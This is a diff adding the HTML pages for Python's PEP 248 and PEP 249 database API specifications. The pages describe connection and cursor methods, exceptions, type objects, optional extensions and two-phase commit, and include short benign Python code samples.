For databases that do not have cursors and for simple applications that do not require the complexity of a cursor, a Connection Object should respond to each of the attributes and methods of the Cursor Object. Databases that have cursors can implement this by using an implicit, internal cursor.
+
+
+
+

Cursor Objects

+

These objects represent a database cursor, which is used to manage +the context of a fetch operation.

+

Cursor Objects should respond to the following methods and +attributes:

+
+
arraysize
This read/write attribute specifies the number of rows to +fetch at a time with fetchmany(). This value is also used +when inserting multiple rows at a time (passing a +tuple/list of tuples/lists as the params value to +execute()). This attribute will default to a single row.

Note that the arraysize is optional and is merely provided +for higher performance database interactions. +Implementations should observe it with respect to the +fetchmany() method, but are free to interact with the +database a single row at a time.

+
+
description
This read-only attribute is a tuple of 7-tuples. Each +7-tuple contains information describing each result +column: (name, type_code, display_size, internal_size, +precision, scale, null_ok). This attribute will be None +for operations that do not return rows or if the cursor +has not had an operation invoked via the execute() method +yet.

The ‘type_code’ is one of the ‘dbi’ values specified in +the section below.

+

Note: this is a bit in flux. Generally, the first two +items of the 7-tuple will always be present; the others +may be database specific.

+
+
close()
Close the cursor now (rather than whenever __del__ is +called). The cursor will be unusable from this point +forward; an exception will be raised if any operation is +attempted with the cursor.
+
execute(operation [,params])
Execute (prepare) a database operation (query or command). +Parameters may be provided (as a sequence +(e.g. tuple/list)) and will be bound to variables in the +operation. Variables are specified in a database-specific +notation that is based on the index in the parameter tuple +(position-based rather than name-based).

The parameters may also be specified as a sequence of +sequences (e.g. a list of tuples) to insert multiple rows +in a single operation.

+

A reference to the operation will be retained by the +cursor. If the same operation object is passed in again, +then the cursor can optimize its behavior. This is most +effective for algorithms where the same operation is used, +but different parameters are bound to it (many times).

+

For maximum efficiency when reusing an operation, it is +best to use the setinputsizes() method to specify the +parameter types and sizes ahead of time. It is legal for +a parameter to not match the predefined information; the +implementation should compensate, possibly with a loss of +efficiency.

+

Using SQL terminology, these are the possible result +values from the execute() method:

+
    +
  • If the statement is DDL (e.g. CREATE TABLE), then 1 is returned.
  • If the statement is DML (e.g. UPDATE or INSERT), then the number of rows affected is returned (0 or a positive integer).
  • If the statement is DQL (e.g. SELECT), None is returned, indicating that the statement is not really complete until you use one of the ‘fetch’ methods.
+
+
fetchone()
Fetch the next row of a query result, returning a single +tuple.
+
fetchmany([size])
Fetch the next set of rows of a query result, returning as +a list of tuples. An empty list is returned when no more +rows are available. The number of rows to fetch is +specified by the parameter. If it is None, then the +cursor’s arraysize determines the number of rows to be +fetched.

Note there are performance considerations involved with +the size parameter. For optimal performance, it is +usually best to use the arraysize attribute. If the size +parameter is used, then it is best for it to retain the +same value from one fetchmany() call to the next.

+
+
fetchall()
Fetch all rows of a query result, returning as a list of +tuples. Note that the cursor’s arraysize attribute can +affect the performance of this operation.
+
setinputsizes(sizes)
(Note: this method is not well-defined yet.) This can be +used before a call to execute() to predefine memory +areas for the operation’s parameters. sizes is specified +as a tuple – one item for each input parameter. The item +should be a Type object that corresponds to the input that +will be used, or it should be an integer specifying the +maximum length of a string parameter. If the item is +None, then no predefined memory area will be reserved +for that column (this is useful to avoid predefined areas +for large inputs).

This method would be used before the execute() method is +invoked.

+

Note that this method is optional and is merely provided +for higher performance database interaction. +Implementations are free to do nothing and users are free +to not use it.

+
+
setoutputsize(size [,col])
(Note: this method is not well-defined yet.)

Set a column buffer size for fetches of large columns +(e.g. LONG). The column is specified as an index into the +result tuple. Using a column of None will set the default +size for all large columns in the cursor.

+

This method would be used before the execute() method is +invoked.

+

Note that this method is optional and is merely provided +for higher performance database interaction. +Implementations are free to do nothing and users are free +to not use it.

+
+
+
+
+

DBI Helper Objects

+

Many databases need to have the input in a particular format for +binding to an operation’s input parameters. For example, if an +input is destined for a DATE column, then it must be bound to the +database in a particular string format. Similar problems exist +for “Row ID” columns or large binary items (e.g. blobs or RAW +columns). This presents problems for Python since the parameters +to the execute() method are untyped. When the database module +sees a Python string object, it doesn’t know if it should be bound +as a simple CHAR column, as a raw binary item, or as a DATE.

+

To overcome this problem, the ‘dbi’ module was created. This +module specifies some basic database interface types for working +with databases. There are two classes: ‘dbiDate’ and ‘dbiRaw’. +These are simple container classes that wrap up a value. When +passed to the database modules, the module can then detect that +the input parameter is intended as a DATE or a RAW. For symmetry, +the database modules will return DATE and RAW columns as instances +of these classes.

+

A Cursor Object’s ‘description’ attribute returns information +about each of the result columns of a query. The ‘type_code’ is +defined to be one of five types exported by this module: STRING, +RAW, NUMBER, DATE, or ROWID.

+

The module exports the following names:

+
+
dbiDate(value)
This function constructs a ‘dbiDate’ instance that holds a +date value. The value should be specified as an integer +number of seconds since the “epoch” (e.g. time.time()).
+
dbiRaw(value)
This function constructs a ‘dbiRaw’ instance that holds a +raw (binary) value. The value should be specified as a +Python string.
+
STRING
This object is used to describe columns in a database that +are string-based (e.g. CHAR).
+
RAW
This object is used to describe (large) binary columns in +a database (e.g. LONG RAW, blobs).
+
NUMBER
This object is used to describe numeric columns in a +database.
+
DATE
This object is used to describe date columns in a +database.
+
ROWID
This object is used to describe the “Row ID” column in a +database.
+
+
+
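A hedged sketch of the helpers in use; the cursor, table, and ? marker notation are illustrative, since each module defines its own position-based style:

import dbi
import time

cur.execute('INSERT INTO events (happened, payload) VALUES (?, ?)',
            (dbi.dbiDate(time.time()),     # bound as a DATE, not a number
             dbi.dbiRaw('\x00\x01data')))  # bound as RAW, not as CHAR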
+

Acknowledgements

+

Many thanks go to Andrew Kuchling who converted the Python +Database API Specification 1.0 from the original HTML format into +the PEP format in 2001.

+

Greg Stein is the original author of the Python Database API +Specification 1.0. Marc-André later continued maintenance of the API as +an editor.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0248.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0249/index.html b/pep-0249/index.html
new file mode 100644
index 00000000000..da948870806
--- /dev/null
+++ b/pep-0249/index.html
@@ -0,0 +1,1232 @@
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 249 – Python Database API Specification v2.0

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>
+
Discussions-To:
+
Db-SIG list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
12-Apr-1999
+
Post-History:
+

+
Replaces:
+
248
+
+
+
+
Table of Contents +
+
+

Introduction

+

This API has been defined to encourage similarity between the Python +modules that are used to access databases. By doing this, we hope to +achieve a consistency leading to more easily understood modules, code +that is generally more portable across databases, and a broader reach +of database connectivity from Python.

+

Comments and questions about this specification may be directed to the +SIG for Database Interfacing with Python.

+

For more information on database interfacing with Python and available +packages see the Database Topic Guide.

+

This document describes the Python Database API Specification 2.0 and a set of common optional extensions. The previous version, 1.0, is still available as reference in PEP 248. Package writers are encouraged to use this version of the specification as the basis for new interfaces.

+
+
+

Module Interface

+
+

Constructors

+

Access to the database is made available through connection +objects. The module must provide the following constructor for these:

+
+
connect( parameters… )
Constructor for creating a connection to the database.

Returns a Connection Object. It takes a number of parameters +which are database dependent. [1]

+
+
+
+
+

Globals

+

These module globals must be defined:

+
+
apilevel
String constant stating the supported DB API level.

Currently only the strings “1.0” and “2.0” are allowed. +If not given, a DB-API 1.0 level interface should be assumed.

+
+
+
+
threadsafety
Integer constant stating the level of thread safety the interface supports. Possible values are:
threadsafetyMeaning
0Threads may not share the module.
1Threads may share the module, but not connections.
2Threads may share the module and connections.
3Threads may share the module, connections and cursors.
+

Sharing in the above context means that two threads may use a +resource without wrapping it using a mutex semaphore to implement +resource locking. Note that you cannot always make external +resources thread safe by managing access using a mutex: the +resource may rely on global variables or other external sources +that are beyond your control.

+
+
+
+
paramstyle
String constant stating the type of parameter marker formatting expected by the interface. Possible values are [2]:
paramstyleMeaning
qmarkQuestion mark style, e.g. ...WHERE name=?
numericNumeric, positional style, e.g. ...WHERE name=:1
namedNamed style, e.g. ...WHERE name=:name
formatANSI C printf format codes, e.g. ...WHERE name=%s
pyformatPython extended format codes, e.g. ...WHERE name=%(name)s
+
+
+
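To illustrate the table above, here is the same query written for each style (table and column names are illustrative; a given module implements exactly one paramstyle):

sql_qmark    = "SELECT * FROM people WHERE name = ?"
sql_numeric  = "SELECT * FROM people WHERE name = :1"
sql_named    = "SELECT * FROM people WHERE name = :name"
sql_format   = "SELECT * FROM people WHERE name = %s"
sql_pyformat = "SELECT * FROM people WHERE name = %(name)s"

cur.execute(sql_qmark, ("Alice",))          # positional styles take a sequence
cur.execute(sql_named, {"name": "Alice"})   # named styles take a mapping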
+
+

Exceptions

+

The module should make all error information available through these +exceptions or subclasses thereof:

+
+
Warning
Exception raised for important warnings like data truncations +while inserting, etc. It must be a subclass of the Python +Exception class [10] [11].
+
+
+
Error
Exception that is the base class of all other error +exceptions. You can use this to catch all errors with one single +except statement. Warnings are not considered errors and thus +should not use this class as base. It must be a subclass of the +Python Exception class [10].
+
+
+
InterfaceError
Exception raised for errors that are related to the database +interface rather than the database itself. It must be a subclass +of Error.
+
+
+
DatabaseError
Exception raised for errors that are related to the database. It +must be a subclass of Error.
+
+
+
DataError
Exception raised for errors that are due to problems with the +processed data like division by zero, numeric value out of range, +etc. It must be a subclass of DatabaseError.
+
+
+
OperationalError
Exception raised for errors that are related to the database’s +operation and not necessarily under the control of the programmer, +e.g. an unexpected disconnect occurs, the data source name is not +found, a transaction could not be processed, a memory allocation +error occurred during processing, etc. It must be a subclass of +DatabaseError.
+
+
+
IntegrityError
Exception raised when the relational integrity of the database is +affected, e.g. a foreign key check fails. It must be a subclass +of DatabaseError.
+
+
+
InternalError
Exception raised when the database encounters an internal error, +e.g. the cursor is not valid anymore, the transaction is out of +sync, etc. It must be a subclass of DatabaseError.
+
+
+
ProgrammingError
Exception raised for programming errors, e.g. table not found or +already exists, syntax error in the SQL statement, wrong number of +parameters specified, etc. It must be a subclass of +DatabaseError.
+
+
+
NotSupportedError
Exception raised in case a method or database API was used which +is not supported by the database, e.g. requesting a +.rollback() on a connection that does not support transaction +or has transactions turned off. It must be a subclass of +DatabaseError.
+
+

This is the exception inheritance layout [10] [11]:

+
Exception
+|__Warning
+|__Error
+   |__InterfaceError
+   |__DatabaseError
+      |__DataError
+      |__OperationalError
+      |__IntegrityError
+      |__InternalError
+      |__ProgrammingError
+      |__NotSupportedError
+
+
+
+

Note

+

The values of these exceptions are not defined. They should give the user +a fairly good idea of what went wrong, though.

+
+
+
+
+

Connection Objects

+

Connection objects should respond to the following methods.

+
+

Connection methods

+
+
.close()
Close the connection now (rather than whenever .__del__() is +called).

The connection will be unusable from this point forward; an Error +(or subclass) exception will be raised if any operation is +attempted with the connection. The same applies to all cursor +objects trying to use the connection. Note that closing a +connection without committing the changes first will cause an +implicit rollback to be performed.

+
+
+
+
.commit()
Commit any pending transaction to the database.

Note that if the database supports an auto-commit feature, this must be +initially off. An interface method may be provided to turn it back on.

+

Database modules that do not support transactions should implement this +method with void functionality.

+
+
+
+
.rollback()
This method is optional since not all databases provide transaction +support. [3]

In case a database does provide transactions this method causes the +database to roll back to the start of any pending transaction. Closing a +connection without committing the changes first will cause an implicit +rollback to be performed.

+
+
+
+
.cursor()
Return a new Cursor Object using the connection.

If the database does not provide a direct cursor concept, the module will +have to emulate cursors using other means to the extent needed by this +specification. [4]

+
+
+
+
+
+

Cursor Objects

+

These objects represent a database cursor, which is used to manage the context of a fetch operation. Cursors created from the same connection are not isolated, i.e., any changes done to the database by a cursor are immediately visible to the other cursors. Cursors created from different connections may or may not be isolated, depending on how the transaction support is implemented (see also the connection’s .rollback() and .commit() methods).

+

Cursor Objects should respond to the following methods and attributes.

+
+

Cursor attributes

+
+
.description
This read-only attribute is a sequence of 7-item sequences.

Each of these sequences contains information describing one result +column:

+
    +
  • name
  • type_code
  • display_size
  • internal_size
  • precision
  • scale
  • null_ok
+

The first two items (name and type_code) are mandatory, +the other five are optional and are set to None if no +meaningful values can be provided.

+

This attribute will be None for operations that do not return +rows or if the cursor has not had an operation invoked via the +.execute*() method yet.

+

The type_code can be interpreted by comparing it to the Type +Objects specified in the section below.

+
+
+
+
.rowcount
This read-only attribute specifies the number of rows that the last +.execute*() produced (for DQL statements like SELECT) or affected +(for DML statements like UPDATE or INSERT). [9]

The attribute is -1 in case no .execute*() has been performed on the cursor or the rowcount of the last operation cannot be determined by the interface. [7]

+
+

Note

+

Future versions of the DB API specification could redefine the +latter case to have the object return None instead of -1.

+
+
+
+
+
+

Cursor methods

+
+
.callproc( procname [, parameters ] )
(This method is optional since not all databases provide stored +procedures. [3])

Call a stored database procedure with the given name. The sequence +of parameters must contain one entry for each argument that the +procedure expects. The result of the call is returned as modified +copy of the input sequence. Input parameters are left untouched, +output and input/output parameters replaced with possibly new +values.

+

The procedure may also provide a result set as output. This must +then be made available through the standard .fetch*() methods.

+
+
+
+
.close()
Close the cursor now (rather than whenever __del__ is called).

The cursor will be unusable from this point forward; an Error (or +subclass) exception will be raised if any operation is attempted +with the cursor.

+
+
+
+
.execute(operation [, parameters])
Prepare and execute a database operation (query or command).

Parameters may be provided as sequence or mapping and will be +bound to variables in the operation. Variables are specified in a +database-specific notation (see the module’s paramstyle attribute +for details). [5]

+

A reference to the operation will be retained by the cursor. If +the same operation object is passed in again, then the cursor can +optimize its behavior. This is most effective for algorithms +where the same operation is used, but different parameters are +bound to it (many times).

+

For maximum efficiency when reusing an operation, it is best to +use the .setinputsizes() method to specify the parameter types +and sizes ahead of time. It is legal for a parameter to not match +the predefined information; the implementation should compensate, +possibly with a loss of efficiency.

+

The parameters may also be specified as list of tuples to +e.g. insert multiple rows in a single operation, but this kind of +usage is deprecated: .executemany() should be used instead.

+

Return values are not defined.

+
+
+
+
.executemany( operation, seq_of_parameters )
Prepare a database operation (query or command) and then execute it +against all parameter sequences or mappings found in the sequence +seq_of_parameters.

Modules are free to implement this method using multiple calls to +the .execute() method or by using array operations to have the +database process the sequence as a whole in one call.

+

Use of this method for an operation which produces one or more +result sets constitutes undefined behavior, and the implementation +is permitted (but not required) to raise an exception when it +detects that a result set has been created by an invocation of the +operation.

+

The same comments as for .execute() also apply accordingly to +this method.

+

Return values are not defined.

+
+
+
+
.fetchone()
Fetch the next row of a query result set, returning a single +sequence, or None when no more data is available. [6]

An Error (or subclass) exception is raised if the previous call +to .execute*() did not produce any result set or no call was +issued yet.

+
+
+
+
.fetchmany([size=cursor.arraysize])
Fetch the next set of rows of a query result, returning a sequence +of sequences (e.g. a list of tuples). An empty sequence is +returned when no more rows are available.

The number of rows to fetch per call is specified by the +parameter. If it is not given, the cursor’s arraysize determines +the number of rows to be fetched. The method should try to fetch +as many rows as indicated by the size parameter. If this is not +possible due to the specified number of rows not being available, +fewer rows may be returned.

+

An Error (or subclass) exception is raised if the previous call +to .execute*() did not produce any result set or no call was +issued yet.

+

Note there are performance considerations involved with the size +parameter. For optimal performance, it is usually best to use the +.arraysize attribute. If the size parameter is used, then it +is best for it to retain the same value from one .fetchmany() +call to the next.

+
+
+
+
.fetchall()
Fetch all (remaining) rows of a query result, returning them as a +sequence of sequences (e.g. a list of tuples). Note that the +cursor’s arraysize attribute can affect the performance of this +operation.

An Error (or subclass) exception is raised if the previous call +to .execute*() did not produce any result set or no call was +issued yet.

+
+
+
+
.nextset()
(This method is optional since not all databases support multiple +result sets. [3])

This method will make the cursor skip to the next available set, +discarding any remaining rows from the current set.

+

If there are no more sets, the method returns None. Otherwise, +it returns a true value and subsequent calls to the .fetch*() +methods will return rows from the next result set.

+

An Error (or subclass) exception is raised if the previous call +to .execute*() did not produce any result set or no call was +issued yet.

+
+
+
+
.arraysize
This read/write attribute specifies the number of rows to fetch at +a time with .fetchmany(). It defaults to 1 meaning to fetch a +single row at a time.

Implementations must observe this value with respect to the +.fetchmany() method, but are free to interact with the database +a single row at a time. It may also be used in the implementation +of .executemany().

+
+
+
+
.setinputsizes(sizes)
This can be used before a call to .execute*() to predefine +memory areas for the operation’s parameters.

sizes is specified as a sequence — one item for each input +parameter. The item should be a Type Object that corresponds to +the input that will be used, or it should be an integer specifying +the maximum length of a string parameter. If the item is +None, then no predefined memory area will be reserved for that +column (this is useful to avoid predefined areas for large +inputs).

+

This method would be used before the .execute*() method is +invoked.

+

Implementations are free to have this method do nothing and users +are free to not use it.

+
+
+
+
.setoutputsize(size [, column])
Set a column buffer size for fetches of large columns +(e.g. LONGs, BLOBs, etc.). The column is specified as +an index into the result sequence. Not specifying the column will +set the default size for all large columns in the cursor.

This method would be used before the .execute*() method is +invoked.

+

Implementations are free to have this method do nothing and users +are free to not use it.

+
+
+
+
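As a worked example, the standard library’s sqlite3 module implements this specification (with the qmark paramstyle), so the cursor methods above compose like this:

import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE people (name TEXT, age INTEGER)")
cur.executemany("INSERT INTO people VALUES (?, ?)",
                [("Alice", 30), ("Bob", 25)])
conn.commit()
cur.execute("SELECT name FROM people WHERE age > ?", (26,))
print(cur.fetchall())    # [('Alice',)]
cur.close()
conn.close()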
+
+

Type Objects and Constructors

+

Many databases need to have the input in a particular format for +binding to an operation’s input parameters. For example, if an input +is destined for a DATE column, then it must be bound to the +database in a particular string format. Similar problems exist for +“Row ID” columns or large binary items (e.g. blobs or RAW +columns). This presents problems for Python since the parameters to +the .execute*() method are untyped. When the database module sees +a Python string object, it doesn’t know if it should be bound as a +simple CHAR column, as a raw BINARY item, or as a DATE.

+

To overcome this problem, a module must provide the constructors +defined below to create objects that can hold special values. When +passed to the cursor methods, the module can then detect the proper +type of the input parameter and bind it accordingly.

+

A Cursor Object’s description attribute returns information about +each of the result columns of a query. The type_code must compare +equal to one of Type Objects defined below. Type Objects may be equal +to more than one type code (e.g. DATETIME could be equal to the +type codes for date, time and timestamp columns; see the +Implementation Hints below for details).

+

The module exports the following constructors and singletons:

+
+
Date(year, month, day)
This function constructs an object holding a date value.
+
+
+
Time(hour, minute, second)
This function constructs an object holding a time value.
+
+
+
Timestamp(year, month, day, hour, minute, second)
This function constructs an object holding a time stamp value.
+
+
+
DateFromTicks(ticks)
This function constructs an object holding a date value from the +given ticks value (number of seconds since the epoch; see the +documentation of the standard Python time module for details).
+
+
+
TimeFromTicks(ticks)
This function constructs an object holding a time value from the +given ticks value (number of seconds since the epoch; see the +documentation of the standard Python time module for details).
+
+
+
TimestampFromTicks(ticks)
This function constructs an object holding a time stamp value from +the given ticks value (number of seconds since the epoch; see the +documentation of the standard Python time module for details).
+
+
+
Binary(string)
This function constructs an object capable of holding a binary +(long) string value.
+
+
+
STRING type
This type object is used to describe columns in a database that +are string-based (e.g. CHAR).
+
+
+
BINARY type
This type object is used to describe (long) binary columns in a +database (e.g. LONG, RAW, BLOBs).
+
+
+
NUMBER type
This type object is used to describe numeric columns in a +database.
+
+
+
DATETIME type
This type object is used to describe date/time columns in a +database.
+
+
+
ROWID type
This type object is used to describe the “Row ID” column in a +database.
+
+

SQL NULL values are represented by the Python None singleton +on input and output.

+
+

Note

+

Usage of Unix ticks for database interfacing can cause troubles +because of the limited date range they cover.

+
+
+
+

Implementation Hints for Module Authors

+
    +
  • Date/time objects can be implemented as Python datetime module objects (available +since Python 2.3, with a C API since 2.4) or using the mxDateTime package +(available for all Python versions since 1.5.2). They both provide +all necessary constructors and methods at Python and C level.
  • Here is a sample implementation of the Unix ticks based constructors +for date/time delegating work to the generic constructors:
    import time
    +
    +def DateFromTicks(ticks):
    +    return Date(*time.localtime(ticks)[:3])
    +
    +def TimeFromTicks(ticks):
    +    return Time(*time.localtime(ticks)[3:6])
    +
    +def TimestampFromTicks(ticks):
    +    return Timestamp(*time.localtime(ticks)[:6])
    +
    +
    +
  • The preferred object types for Binary objects are the buffer types available in standard Python starting with version 1.5.2. Please see the Python documentation for details. For information about the C interface have a look at Include/bufferobject.h and Objects/bufferobject.c in the Python source distribution.
  • This Python class allows implementing the above type objects even though the description type code field yields multiple values for one type object:
    class DBAPITypeObject:
    +    def __init__(self,*values):
    +        self.values = values
    +    def __cmp__(self,other):
    +        if other in self.values:
    +            return 0
    +        if other < self.values:
    +            return 1
    +        else:
    +            return -1
    +
    +
    +

    The resulting type object compares equal to all values passed to the +constructor.

    +
  • Here is a snippet of Python code that implements the exception +hierarchy defined above [10]:
    class Error(Exception):
    +    pass
    +
    +class Warning(Exception):
    +    pass
    +
    +class InterfaceError(Error):
    +    pass
    +
    +class DatabaseError(Error):
    +    pass
    +
    +class InternalError(DatabaseError):
    +    pass
    +
    +class OperationalError(DatabaseError):
    +    pass
    +
    +class ProgrammingError(DatabaseError):
    +    pass
    +
    +class IntegrityError(DatabaseError):
    +    pass
    +
    +class DataError(DatabaseError):
    +    pass
    +
    +class NotSupportedError(DatabaseError):
    +    pass
    +
    +
    +

    In C you can use the PyErr_NewException(fullname, base, NULL) +API to create the exception objects.

    +
+
+
+

Optional DB API Extensions

+

During the lifetime of DB API 2.0, module authors have often extended +their implementations beyond what is required by this DB API +specification. To enhance compatibility and to provide a clean upgrade +path to possible future versions of the specification, this section +defines a set of common extensions to the core DB API 2.0 +specification.

+

As with all DB API optional features, the database module authors are +free to not implement these additional attributes and methods (using +them will then result in an AttributeError) or to raise a +NotSupportedError in case the availability can only be checked at +run-time.

+

It has been proposed to make usage of these extensions optionally +visible to the programmer by issuing Python warnings through the +Python warning framework. To make this feature useful, the warning +messages must be standardized in order to be able to mask them. These +standard messages are referred to below as Warning Message.

+
+
Cursor.rownumber
This read-only attribute should provide the current 0-based index +of the cursor in the result set or None if the index cannot be +determined.

The index can be seen as index of the cursor in a sequence (the +result set). The next fetch operation will fetch the row indexed +by .rownumber in that sequence.

+

Warning Message: “DB-API extension cursor.rownumber used”

+
+
+
+
Connection.Error, Connection.ProgrammingError, etc.
All exception classes defined by the DB API standard should be +exposed on the Connection objects as attributes (in addition to +being available at module scope).

These attributes simplify error handling in multi-connection +environments.

+

Warning Message: “DB-API extension connection.<exception> used”

+
+
+
+
Cursor.connection
This read-only attribute returns a reference to the Connection object on which the cursor was created.

The attribute simplifies writing polymorphic code in multi-connection environments.

+

Warning Message: “DB-API extension cursor.connection used”

+
+
+
+
Cursor.scroll(value [, mode=’relative’ ])
Scroll the cursor in the result set to a new position according to +mode.

If mode is relative (default), value is taken as an offset to the current position in the result set; if set to absolute, value states an absolute target position.

+

An IndexError should be raised in case a scroll operation +would leave the result set. In this case, the cursor position is +left undefined (ideal would be to not move the cursor at all).

+
+

Note

+

This method should use native scrollable cursors, if available, +or revert to an emulation for forward-only scrollable +cursors. The method may raise NotSupportedError to signal +that a specific operation is not supported by the database +(e.g. backward scrolling).

+
+

Warning Message: “DB-API extension cursor.scroll() used”

+
+
+
+
Cursor.messages
This is a Python list object to which the interface appends tuples +(exception class, exception value) for all messages which the +interfaces receives from the underlying database for this cursor.

The list is cleared automatically by all standard cursor method calls (prior to executing the call), except for the .fetch*() calls, to avoid excessive memory usage, and can also be cleared by executing del cursor.messages[:].

+

All error and warning messages generated by the database are +placed into this list, so checking the list allows the user to +verify correct operation of the method calls.

+

The aim of this attribute is to eliminate the need for a Warning +exception which often causes problems (some warnings really only +have informational character).

+

Warning Message: “DB-API extension cursor.messages used”

+
+
+
+
Connection.messages
Same as Cursor.messages except that the messages in the list are +connection oriented.

The list is cleared automatically by all standard connection method calls (prior to executing the call) to avoid excessive memory usage, and can also be cleared by executing del connection.messages[:].

+

Warning Message: “DB-API extension connection.messages used”

+
+
+
+
Cursor.next()
Return the next row from the currently executing SQL statement +using the same semantics as .fetchone(). A StopIteration +exception is raised when the result set is exhausted for Python +versions 2.2 and later. Previous versions don’t have the +StopIteration exception and so the method should raise an +IndexError instead.

Warning Message: “DB-API extension cursor.next() used”

+
+
+
+
Cursor.__iter__()
Return self to make cursors compatible to the iteration protocol +[8].

Warning Message: “DB-API extension cursor.__iter__() used”

+
+
+
+
Cursor.lastrowid
This read-only attribute provides the rowid of the last modified +row (most databases return a rowid only when a single INSERT +operation is performed). If the operation does not set a rowid or +if the database does not support rowids, this attribute should be +set to None.

The semantics of .lastrowid are undefined in case the last +executed statement modified more than one row, e.g. when using +INSERT with .executemany().

+

Warning Message: “DB-API extension cursor.lastrowid used”

+
+
+
+
Connection.autocommit
Attribute to query and set the autocommit mode of the connection.

Return True if the connection is operating in autocommit +(non-transactional) mode. Return False if the connection is +operating in manual commit (transactional) mode.

+

Setting the attribute to True or False adjusts the +connection’s mode accordingly.

+

Changing the setting from True to False (disabling +autocommit) will have the database leave autocommit mode and start +a new transaction. Changing from False to True (enabling +autocommit) has database dependent semantics with respect to how +pending transactions are handled. [12]

+

Deprecation notice: Even though several database modules implement +both the read and write nature of this attribute, setting the +autocommit mode by writing to the attribute is deprecated, since +this may result in I/O and related exceptions, making it difficult +to implement in an async context. [13]

+

Warning Message: “DB-API extension connection.autocommit used”

+
+
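For instance, a cursor that implements the two iteration extensions above can be consumed with a plain for loop (a sketch, assuming an open cursor cur):

cur.execute("SELECT name FROM people")
for row in cur:          # uses Cursor.__iter__() and Cursor.next()
    print(row[0])        # equivalent to repeated .fetchone() calls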
+
+
+

Optional Error Handling Extensions

+

The core DB API specification only introduces a set of exceptions +which can be raised to report errors to the user. In some cases, +exceptions may be too disruptive for the flow of a program or even +render execution impossible.

+

For these cases and in order to simplify error handling when dealing +with databases, database module authors may choose to implement user +definable error handlers. This section describes a standard way of +defining these error handlers.

+
+
Connection.errorhandler, Cursor.errorhandler
Read/write attribute which references an error handler to call in +case an error condition is met.

The handler must be a Python callable taking the following arguments:

+
errorhandler(connection, cursor, errorclass, errorvalue)
+

where connection is a reference to the connection on which the cursor operates, cursor is a reference to the cursor (or None in case the error does not apply to a cursor), and errorclass is an error class to instantiate using errorvalue as the construction argument.

+

The standard error handler should add the error information to the +appropriate .messages attribute (Connection.messages or +Cursor.messages) and raise the exception defined by the given +errorclass and errorvalue parameters.

+

If no .errorhandler is set (the attribute is None), the +standard error handling scheme as outlined above, should be +applied.

+

Warning Message: “DB-API extension .errorhandler used”

+
+
+

Cursors should inherit the .errorhandler setting from their +connection objects at cursor creation time.

+
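A hedged sketch of a handler matching the signature above; it records errors on the appropriate .messages list instead of raising, assuming the module also implements the .messages extension:

def logging_errorhandler(connection, cursor, errorclass, errorvalue):
    target = cursor if cursor is not None else connection
    target.messages.append((errorclass, errorvalue))   # record, don't raise

conn.errorhandler = logging_errorhandler   # cursors created later inherit it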
+
+

Optional Two-Phase Commit Extensions

+

Many databases have support for two-phase commit (TPC) which allows +managing transactions across multiple database connections and other +resources.

+

If a database backend provides support for two-phase commit and the database module author wishes to expose this support, the following API should be implemented. NotSupportedError should be raised if the database backend’s support for two-phase commit can only be checked at run-time.

+
+

TPC Transaction IDs

+

As many databases follow the XA specification, transaction IDs are +formed from three components:

+
    +
  • a format ID
  • a global transaction ID
  • a branch qualifier
+

For a particular global transaction, the first two components should +be the same for all resources. Each resource in the global +transaction should be assigned a different branch qualifier.

+

The various components must satisfy the following criteria:

+
    +
  • format ID: a non-negative 32-bit integer.
  • global transaction ID and branch qualifier: byte strings no longer than 64 characters.
+

Transaction IDs are created with the .xid() Connection method:

+
+
.xid(format_id, global_transaction_id, branch_qualifier)
Returns a transaction ID object suitable for passing to the +.tpc_*() methods of this connection.

If the database connection does not support TPC, a +NotSupportedError is raised.

+

The type of the object returned by .xid() is not defined, but +it must provide sequence behaviour, allowing access to the three +components. A conforming database module could choose to +represent transaction IDs with tuples rather than a custom object.

+
+
+
+
+

TPC Connection Methods

+
+
.tpc_begin(xid)
Begins a TPC transaction with the given transaction ID xid.

This method should be called outside of a transaction (i.e. +nothing may have executed since the last .commit() or +.rollback()).

+

Furthermore, it is an error to call .commit() or .rollback() +within the TPC transaction. A ProgrammingError is raised, if the +application calls .commit() or .rollback() during an active +TPC transaction.

+

If the database connection does not support TPC, a +NotSupportedError is raised.

+
+
+
+
.tpc_prepare()
Performs the first phase of a transaction started with .tpc_begin(). A ProgrammingError should be raised if this method is called outside of a TPC transaction.

After calling .tpc_prepare(), no statements can be executed +until .tpc_commit() or .tpc_rollback() have been called.

+
+
+
+
.tpc_commit([ xid ])
When called with no arguments, .tpc_commit() commits a TPC +transaction previously prepared with .tpc_prepare().

If .tpc_commit() is called prior to .tpc_prepare(), a single +phase commit is performed. A transaction manager may choose to do +this if only a single resource is participating in the global +transaction.

+

When called with a transaction ID xid, the database commits the +given transaction. If an invalid transaction ID is provided, a +ProgrammingError will be raised. This form should be called +outside of a transaction, and is intended for use in recovery.

+

On return, the TPC transaction is ended.

+
+
+
+
.tpc_rollback([ xid ])
When called with no arguments, .tpc_rollback() rolls back a TPC +transaction. It may be called before or after .tpc_prepare().

When called with a transaction ID xid, it rolls back the given +transaction. If an invalid transaction ID is provided, a +ProgrammingError is raised. This form should be called outside +of a transaction, and is intended for use in recovery.

+

On return, the TPC transaction is ended.

+
+
+
+
.tpc_recover()
Returns a list of pending transaction IDs suitable for use with +.tpc_commit(xid) or .tpc_rollback(xid).

If the database does not support transaction recovery, it may +return an empty list or raise NotSupportedError.

+
+
+
+
+
+
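Taken together, these methods support flows like the following sketch, where conn is a hypothetical open connection whose backend supports TPC:

xid = conn.xid(1, 'transaction-1', 'branch-1')
conn.tpc_begin(xid)                  # start the TPC transaction
cur = conn.cursor()
cur.execute("INSERT INTO log VALUES ('hello')")
conn.tpc_prepare()                   # phase one
conn.tpc_commit()                    # phase two: commit what was prepared

# Recovery after a crash: finish transactions left in the
# prepared state, using the xid forms of commit/rollback.
for pending_xid in conn.tpc_recover():
    conn.tpc_rollback(pending_xid)   # or conn.tpc_commit(pending_xid)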

Frequently Asked Questions

+

The database SIG often sees recurring questions about the DB API specification. This section covers some of the issues people sometimes have with the specification.

+

Question:

+

How can I construct a dictionary out of the tuples returned by .fetch*()?

+

Answer:

+

There are several existing tools available which provide helpers for this task. Most of them take the column names defined in the cursor attribute .description as the basis for the keys in the row dictionary.
